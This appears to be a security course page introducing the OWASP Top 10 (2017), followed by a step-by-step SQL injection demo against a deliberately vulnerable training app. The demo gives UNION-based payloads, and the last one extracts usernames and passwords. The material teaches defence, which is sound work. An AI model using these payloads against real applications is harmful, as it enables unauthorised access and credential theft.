Many organizations are still struggling to build secure applications as they lack awareness on how to implement security features effectively. Hence, OWASP (Open Web Application Security Project) helps organizations deal with this.
About OWASP
- A non-profit worldwide charitable organization
- Focuses on improving the security of software applications
- Educates designers, developers, and business owners on various risks commonly associated with Web applications
OWASP Top-10 and Its Versions
OWASP Top-10 is an awareness document, listing the Top-10 vulnerabilities found in web applications. It was first developed in 2003 with subsequent releases in 2004, 2007, 2010, 2013, and 2017.
OWASP's main aim is to make application security guidelines easily available to all, so that developers and organizations can make correct decisions about application security risks. Everyone is free to participate in OWASP, and all of its material is available under a free and open software license.
To better understand the vulnerabilities listed by OWASP, let us go through the Top-10 vulnerabilities suggested in the 2017 release.
Note: In this course, we are covering OWASP TOP 10 Vulnerabilities 2017 release.
Approximately 85% of successful exploits are due to Top-10 known vulnerabilities. The goal of the Top-10 project is to raise awareness about application security by identifying some of the most critical vulnerabilities in web applications. The ordering is based on the risk and prevalence of the vulnerabilities. Severity and prevalence decrease down the list, with A1 being the most severe vulnerability and A10 being the lowest on a scale of 1 to 10.
The image lists the OWASP Top 10 Vulnerabilities - Injection, Broken Authentication and Session Management, Sensitive Data Exposure, XML External Entity, Broken Access Control, Security Misconfiguration, Cross-Site Scripting, Insecure Deserialization, Using Components with Known Vulnerabilities, and Insufficient Logging and Monitoring. OWASP encourages organizations to follow the guidelines while developing a web application and encourages developers to learn from the mistakes of other organizations.
The list belongs to the OWASP Top-10 2017 release. Let us understand the first vulnerability A1: Injection.
A1: Injection
Understanding Injection
Injection is about supplying untrusted input to a program, which gets processed by an interpreter as part of a command or query, hence altering the course of execution of that program. Code that the interpreter processes is a mix of instructions written by the programmer and the data supplied by the user.
Injection attacks are among the oldest and most dangerous application attacks. They can result in data theft, data loss, loss of data integrity, denial of service, as well as full system compromise. Interpreted languages through which injection is possible include SQL, LDAP, XML, Perl, PHP, etc.
Types of Injections
- SQL Injection
- XML Injection
- LDAP Injection
- SOAP Injection
- HQL Injection
- OS Command Injection
- Xquery Injection
- Xpath Injection
Note: In this course, we will only cover SQL injection in detail.
SQL Injection
SQL Injection refers to an injection attack where an attacker can execute malicious SQL statements that can access a web application's database server.
Attack Motive
- To gain access to the database
- To delete/corrupt the data
- To cause denial of data access
- To take over the complete host (Operating System)
Procedure of the Attack
- Hacker sends specially framed inputs with SQL statements embedded, altering the semantics of the query.
- Untrusted/Invalidated data is sent to the program, the interpreter.
- The program is fooled, and the hacker succeeds in making the server run unintended queries.
A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database, such as shutting down the DBMS, recovering the content of a given file present on the DBMS file system, and in some cases, issuing commands to the operating system.
SQL Injection - Demo
Explore the Existing Search Functionality of WeakApp Application
For this demo, we will use the WeakApp application, which has a search feature named 'Display records' that displays the user ID and the email ID of the users whose names have the given search character/string.
Step 1: Accessing the Feature
Click on the link – “Display Records: SQL Injection”.
Below is a snapshot of the UI for Display records:
Step 2: Let us use the search functionality to display the user id and email id of the users who have character ‘v’ in their user id.
Search String: v
Output:
The backend SQL code for this search functionality is as follows:
SELECT userid, email FROM userAccounts WHERE userid LIKE '%v%';
The SQL query has been formed using the concatenation operator, making the code vulnerable to SQL Injection.
Step 2: Hacking the Application
Let us try to hack the application to reveal the usernames and passwords of all the users of the WeakApp application.
Search String:
' union select null --
This query purposely has a space after the '
Original Query:
SELECT userid, email FROM userAccounts WHERE userid LIKE '%" + matchText + "%';
Formed Query:
SELECT userid, email FROM userAccounts WHERE userid LIKE '%' union select null -- %';
The query will attempt to display the user ID and email ID of all the users appended with null.
The code written after the -- symbol gets commented.
The appended text attempts to append the data "null" to the existing query, but results in an error due to different column numbers:
HTTP Status 500 - java.sql.SQLException: The used SELECT statements have a different number of columns
Let us now find the right number of columns in the table and type of data each column can hold.
Finding the Number of Columns
Try injecting the following:
' union select 1, 2 --
Original Query:
SELECT userid, email FROM userAccounts WHERE userid LIKE '%" + matchText + "%';
Formed Query:
SELECT userid, email FROM userAccounts WHERE userid LIKE '%' union select 1, 2 -- %';
If the application accepts the input and runs the query successfully, then it means that the table userAccounts has only 2 columns.
Since the above query runs successfully, we can confirm that there are 2 columns in the table userAccounts.
The output shows the snapshot of SQL Injection: Display Records, where the fields userID and emailID have data 1 and 2 respectively.
Now, let us try the next SQL Injection to fetch the username and password data of the users.
Fetching Username and Password
Try injecting the following:
' union select username, password from userAccounts --
Formed Query:
SELECT userid, email FROM userAccounts WHERE userid LIKE '%' union select username, password from userAccounts -- %';
The output shows the user ID and email ID fields showing the username and password respectively.
Below is a snapshot of SQL Injection: Display Records with input text ' union select username, password from userAccounts --
0 Comments